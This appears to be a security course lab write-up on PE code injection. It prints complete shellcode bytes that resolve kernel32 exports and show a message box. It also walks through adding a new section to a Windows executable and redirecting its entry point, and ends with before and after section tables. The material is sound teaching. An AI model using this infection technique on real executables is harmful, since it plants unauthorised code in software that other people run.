Part II Code Injection
In this part you will see a program that injects a piece of shellcode into an existing PE file. The shellcode pops up a message box and then runs the original code of the PE file.
- Download code.c, peinj.cpp and hello.exe.
- Read code.c and peinj.cpp. Make sure you understand the principle of code injection.
- code.c generates the shellcode to be injected into hello.exe. The code between the labels _start and _end is the assembly version of the shellcode; the loop in the C code that follows walks those bytes and prints them as a C byte array, together with the total size and the offsets of the two parameter slots the injector has to fill.
- peinj.cpp is the source code that does the injection. The shellcode to be injected is stored in the global array injcode1, which is empty at present. PEOpenFile() is almost the same as the one you saw in the previous part. main() first loads hello.exe into memory with PEOpenFile(), then calls PEInject() to add a new section containing the shellcode and redirect the entry point to that section, and finally uses PESaveFile() to write the new PE image to hello1.exe.
- Compile code.c and run the generated executable. Paste the shellcode it prints into peinj.cpp.
- Compile peinj.cpp and run the generated executable.
- Run hello.exe and hello1.exe, and observe the difference in their behavior.
- Use the PEdump you wrote earlier, or PEditor/Stud_PE, to analyze hello.exe and hello1.exe, then fill in the tables.
Work out what code.c does, then run it from the command line to get the shellcode:
C:\>code
0x60,0x55,
0x8B,0xEC,0x83,0xEC,0x14,0xE8,0x77,0x00,
0x00,0x00,0x89,0x45,0xFC,0x50,0xE8,0x8C,
0x00,0x00,0x00,0x89,0x45,0xF8,0x83,0xC4,
0x04,0xE8,0x0D,0x00,0x00,0x00,0x4C,0x6F,
0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,
0x79,0x41,0x00,0xFF,0x75,0xFC,0xFF,0x55,
0xF8,0x89,0x45,0xF4,0xE8,0x0B,0x00,0x00,
0x00,0x75,0x73,0x65,0x72,0x33,0x32,0x2E,
0x64,0x6C,0x6C,0x00,0xFF,0x55,0xF4,0x89,
0x45,0xF0,0xE8,0x0C,0x00,0x00,0x00,0x4D,
0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6F,
0x78,0x41,0x00,0xFF,0x75,0xF0,0xFF,0x55,
0xF8,0x89,0x45,0xEC,0x6A,0x00,0xE8,0x01,
0x00,0x00,0x00,0x00,0xE8,0x06,0x00,0x00,
0x00,0x48,0x65,0x6C,0x6C,0x6F,0x00,0x6A,
0x00,0xFF,0x55,0xEC,0x8B,0xE5,0x5D,0xEB,
0x6B,0x55,0x8B,0xEC,0x56,0x57,0x64,0xA1,
0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,
0x70,0x1C,0x8B,0x06,0x8B,0x78,0x08,0x8B,
0xC7,0x5F,0x5E,0x8B,0xE5,0x5D,0xC3,0x55,
0x8B,0xEC,0x52,0x57,0x56,0x8B,0x5D,0x08,
0x8B,0x43,0x3C,0x8B,0x54,0x03,0x78,0x03,
0xD3,0x8B,0x4A,0x18,0x8B,0x7A,0x20,0x03,
0xFB,0x49,0x8B,0x34,0x8F,0x03,0xF3,0xB8,
0x47,0x65,0x74,0x50,0x39,0x06,0x75,0xF1,
0xB8,0x72,0x6F,0x63,0x41,0x39,0x46,0x04,
0x75,0xE7,0x8B,0x7A,0x24,0x03,0xFB,0x66,
0x8B,0x0C,0x4F,0x8B,0x7A,0x1C,0x03,0xFB,
0x8B,0x04,0x8F,0x03,0xC3,0x56,0x57,0x52,
0x8B,0xE5,0x5D,0xC3,0xE8,0x00,0x00,0x00,
0x00,0x5D,0x81,0xED,0x01,0x11,0x40,0x00,
0x8B,0x85,0x20,0x11,0x40,0x00,0x03,0x85,
0x24,0x11,0x40,0x00,0x89,0x44,0x24,0x1C,
0x61,0x50,0x33,0xC0,0xC3,0xFF,0xE0,0x90,
0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,0xCC,
size(dec) : 282
param1 offset : 0x112
param2 offset : 0x116
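The routine in the dump that begins `0x55,0x8B,0xEC,0x52,0x57,0x56,0x8B,0x5D,0x08` is the shellcode's GetProcAddress finder. It reads e_lfanew from [kernel32+0x3C], the export directory RVA from [kernel32+e_lfanew+0x78], NumberOfNames (+0x18) and AddressOfNames (+0x20), walks the name table from the last entry downward (`dec ecx`) comparing the first eight bytes with "GetProcA", then maps the hit through AddressOfNameOrdinals (+0x24, `mov cx,[edi+ecx*2]`) into AddressOfFunctions (+0x1C). The routine before it obtains kernel32's base from the PEB loader list (fs:[0x30] -> Ldr -> InInitializationOrderModuleList), which is the only part that depends on the Windows version. Below is the same export walk in C, as an added example that is not part of the lab. It runs against build_fake_module(), a constructed image standing in for a loaded kernel32 (an assumption, not a real DLL), and compares the whole name rather than the first eight bytes only.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t ld32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     st32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Resolve `name` in a PE32 module image mapped at `base` (RVAs are plain offsets
 * from base, as in a loaded DLL). Returns the export's RVA, or 0 if absent.
 * Forwarded exports are not handled, same as the shellcode. */
uint32_t find_export_rva(const uint8_t *base, const char *name)
{
    uint32_t pe = ld32(base + 0x3C);                     /* e_lfanew */
    uint32_t exp_rva = ld32(base + pe + 0x78);           /* DataDirectory[0].VirtualAddress */
    if (exp_rva == 0) return 0;
    const uint8_t *ed    = base + exp_rva;               /* IMAGE_EXPORT_DIRECTORY */
    uint32_t       n     = ld32(ed + 0x18);              /* NumberOfNames */
    const uint8_t *funcs = base + ld32(ed + 0x1C);       /* AddressOfFunctions */
    const uint8_t *names = base + ld32(ed + 0x20);       /* AddressOfNames */
    const uint8_t *ords  = base + ld32(ed + 0x24);       /* AddressOfNameOrdinals */
    while (n-- > 0) {                                    /* last name first, like "dec ecx" */
        const char *s = (const char *)(base + ld32(names + 4u * n));
        if (strcmp(s, name) == 0) {
            uint16_t ord = (uint16_t)(ords[2u * n] | (ords[2u * n + 1] << 8));
            return ld32(funcs + 4u * ord);
        }
    }
    return 0;
}

/* Constructed sample: a fake PE32 module with three exports whose sorted name
 * order differs from ordinal order, so the ordinal indirection is exercised.
 * Only the fields the walk touches are filled in; it is not a real DLL. */
static uint8_t g_img[0x600];

const uint8_t *build_fake_module(void)
{
    static const char    *names[] = { "ExitProcess", "GetProcAddress", "LoadLibraryA" };
    static const uint16_t ords[]  = { 1, 2, 0 };         /* name index -> ordinal */
    memset(g_img, 0, sizeof g_img);
    g_img[0] = 'M'; g_img[1] = 'Z'; st32(g_img + 0x3C, 0x40);
    memcpy(g_img + 0x40, "PE\0\0", 4);
    st32(g_img + 0x40 + 0x78, 0x200);                    /* export directory RVA */
    uint8_t *ed = g_img + 0x200;
    st32(ed + 0x14, 3); st32(ed + 0x18, 3);              /* NumberOfFunctions, NumberOfNames */
    st32(ed + 0x1C, 0x300); st32(ed + 0x20, 0x320); st32(ed + 0x24, 0x340);
    /* AddressOfFunctions by ordinal: 0 = LoadLibraryA, 1 = ExitProcess, 2 = GetProcAddress */
    st32(g_img + 0x300, 0x1300); st32(g_img + 0x304, 0x1100); st32(g_img + 0x308, 0x1200);
    uint32_t str_rva = 0x400;
    for (int i = 0; i < 3; i++) {
        strcpy((char *)g_img + str_rva, names[i]);
        st32(g_img + 0x320 + 4 * i, str_rva);            /* AddressOfNames[i] */
        g_img[0x340 + 2 * i] = (uint8_t)ords[i]; g_img[0x341 + 2 * i] = 0;
        str_rva += (uint32_t)strlen(names[i]) + 1;
    }
    return g_img;
}

int main(void)
{
    const uint8_t *k32 = build_fake_module();
    printf("GetProcAddress -> RVA 0x%X\n", find_export_rva(k32, "GetProcAddress"));
    return 0;
}
```

Walking the name table backward, as the shellcode does, is merely a convenient loop shape; because the names are sorted, a prefix compare of only eight bytes would match any later-sorted export that shares the prefix, which is why the C version checks the full string.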
Copy the shellcode into peinj.cpp, then compile it with the following command line:
C:\>cl peinj.cpp user32.lib
Put win.exe in the same directory as peinj.exe; then, when you double-click peinj.exe, you will find that win.exe is infected. Of course, I had it write the result to a separate file, win_inj.exe, to keep the two apart for study. Finally, analyzing its sections with Stud_PE or a similar tool shows that the infected file has one more section than the uninfected one; I named it .new. The experimental results are as follows:
Before injection (win.exe). The entry address: 0001121C
No | Name | VSize | VOffset | RSize | ROffset | Charact. |
01 | .textbss | 00010000 | 00001000 | 00000000 | 00000000 | E00000A0 |
02 | .text | 00003CF9 | 00011000 | 00003E00 | 00000400 | 60000020 |
03 | .rdata | 00001C3A | 00015000 | 00001E00 | 00004200 | 40000040 |
04 | .data | 0000077C | 00017000 | 00000200 | 00006000 | C0000040 |
05 | .idata | 00000ACC | 00018000 | 00000C00 | 00006200 | C0000040 |
06 | .rsrc | 0000F069 | 00019000 | 0000F200 | 00006E00 | 40000040 |
07 | .reloc | 00000576 | 00029000 | 00000600 | 00016000 | 42000040 |
After injection (win_inj.exe). The entry address: 0002A000
No | Name | VSize | VOffset | RSize | ROffset | Charact. |
01 | .textbss | 00010000 | 00001000 | 00000000 | 00000000 | E00000A0 |
02 | .text | 00004000 | 00011000 | 00003E00 | 00000400 | 60000020 |
03 | .rdata | 00002000 | 00015000 | 00001E00 | 00004200 | 40000040 |
04 | .data | 00001000 | 00017000 | 00000200 | 00006000 | C0000040 |
05 | .idata | 00001000 | 00018000 | 00000C00 | 00006200 | C0000040 |
06 | .rsrc | 00010000 | 00019000 | 0000F200 | 00006E00 | 40000040 |
07 | .reloc | 00001000 | 00029000 | 00000600 | 00016000 | 42000040 |
08 | .new | 00001000 | 0002A000 | 00000200 | 00016600 | C0000040 |